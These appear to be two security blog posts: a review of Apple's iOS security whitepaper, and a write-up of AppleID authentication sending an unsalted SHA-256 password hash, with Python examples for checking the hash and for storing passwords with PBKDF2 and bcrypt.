Also described are some of the runtime security features. The core feature here is application sandboxing, where each application is limited in where it can write data, and prevented from accessing other applications’ data or code. To share information with other applications, developers need to communicate through iOS APIs or services. Another noteworthy mention is that the core operating system partition is mounted read-only, further limiting the ability of a malicious program to attack the device.
Probably the most interesting section of this document details the Encryption and Data Protection features of iOS. Much of this is not new, having been detailed at WWDC conferences and in other developer documentation (not to mention several talks by prominent security researchers), but having it in a single, easily-accessible format is a welcome improvement.
The use of hardware-level AES-256 cryptography to provide full-disk encryption and a fast remote wipe capability is already well known, as is the use of a unique UID key embedded in each device’s hardware. What came as a surprise was the statement that this UID is not recorded by Apple or its suppliers, which means that keys (and data) protected using that UID cannot be decrypted by anyone not in possession of the target device (or, presumably, NSA-level supercomputers). Potential issues related to securely erasing stored keys from flash memory are also addressed with Effaceable Storage, where memory blocks are directly erased at a very low level.
Next up is a high-level description of file-based data protection attributes, which, when combined with a device passcode, provide application-level controls over data accessibility. The various protection classes are described, both for files and keychain entries, and it even provides a handy reference chart for system-level keychain entries like Wi-Fi passwords, email accounts, and private keys.
The data protection section finishes with a clear description of the four types of keybags in use on iOS: System, Backup, Escrow, and iCloud Backup keybags. In addition to the plain-English explanation of each keybag’s purpose (and location), the high-level structure of the keybag itself, along with protections for each key, is also given.
Two short sections, one describing Network Security features, and the other providing information on Configuration Profiles, device Restrictions, and MDM control, finish up the document, along with a short glossary.
Unfortunately, the whitepaper doesn’t have enough detail to serve as a reference for programmers or reverse engineers testing specific features. However, it is a great introduction to the complex collection of security features core to iOS. This should be required reading for enterprise-level security engineers and managers, whether contemplating future iOS support or hoping to better understand what they already have.
Two weeks ago, I discovered that Apple sends an unsalted SHA-256 hash as part of an AppleID authentication process. I was looking at traffic from my iPad using MITM Proxy, and came across an interesting packet: an XML authentication request containing my AppleID and a field named “pwdHash”.
The “pwdHash” caught my eye, both because, well, it’s a hash, and also because it looked like a 256-bit hash, which I’d been finding used in some other commercial iOS apps lately. But mostly, it caught my eye because there wasn’t any field labeled “salt.” This might not mean anything — the salt might be known to both parties, and so doesn’t need transmitting. Or maybe it’s a shorter hash, and the first 16 bytes are a salt. Still…it’s worth checking out.
You might also notice a complete lack of any other session-related information in the HTTP header or in the submitted XML. There’s nothing else for the server to go on, other than this hash and the accompanying AppleID.
So, from this I’m inferring one of two things: Either Apple’s got a database of unsalted SHA-256 password hashes for AppleIDs (bad), or they’ve got a database of plaintext passwords for AppleIDs (worse). Either way, I was really surprised by this.
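Confirming that inference is easy enough: hash your own password with plain SHA-256 and compare it to the value on the wire. A quick sketch (both values below are placeholders):

import hashlib

observed = "5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8"  # from the capture
password = "password"  # the account's actual password

if hashlib.sha256(password.encode()).hexdigest() == observed:
    print("pwdHash is just an unsalted SHA-256 of the password")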
So what’s the best way to store password hashes, anyway? There’s been a lot of talk about exactly this over the past day or so, and while almost everyone agrees that unsalted hashes are bad, it’s harder to find agreement on what kind of salt is appropriate.
Probably the best argument (in terms of immediate security and foreseeable longevity) is made in favor of algorithms that use key stretching to increase hash strength. bcrypt, scrypt, and PBKDF2 have been frequently cited as good candidates. These algorithms impose a high work factor, one that’s difficult to defeat with faster hardware or parallelization, to ensure that brute-force attempts are very, very slow. You can read more about how bcrypt, for example, makes these sorts of attacks much more difficult in this short blog post from 2010. Yes, two years ago. It’s not like these problems, or their solutions, are new.
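For illustration, here’s what such a scheme might look like using PBKDF2 from Python’s standard library. The iteration count is arbitrary here; tune it so each hash takes a noticeable fraction of a second.

import hashlib, hmac, os

ITERATIONS = 100_000  # tune to taste; higher = slower brute force

def hash_password(password):
    salt = os.urandom(16)  # unique random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, stored):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, stored)  # constant-time compare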
Are you responsible for the development, maintenance, or security of an application that uses password hashes as part of an authentication system? Open your calendar now, and set aside some time in the next week to look at how you do things and see if it couldn’t be made better. Hopefully, your users will never have need to thank you.
Update: Jeff Jarmoc (@jjarmoc) correctly points out that the hashes don’t have to be stored exactly as transmitted — they could simply be used as input for a more secure hash, like one described above. Even if Apple is storing the unsalted hashes today, they could easily update the servers to a system which stores (for example) the bcrypt of the hash. The nice thing about this is it should only require changes to the server, not to individual clients.
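A sketch of that server-side migration, using the third-party bcrypt package: treat the client’s transmitted pwdHash as the “password,” and store only a bcrypt digest of it. Existing rows could be converted in a single pass, with no client-side changes at all.

import bcrypt

def store(pwd_hash_hex):
    # Wrap the client-supplied SHA-256 value in bcrypt before storing
    return bcrypt.hashpw(pwd_hash_hex.encode(), bcrypt.gensalt())

def check(pwd_hash_hex, stored):
    return bcrypt.checkpw(pwd_hash_hex.encode(), stored)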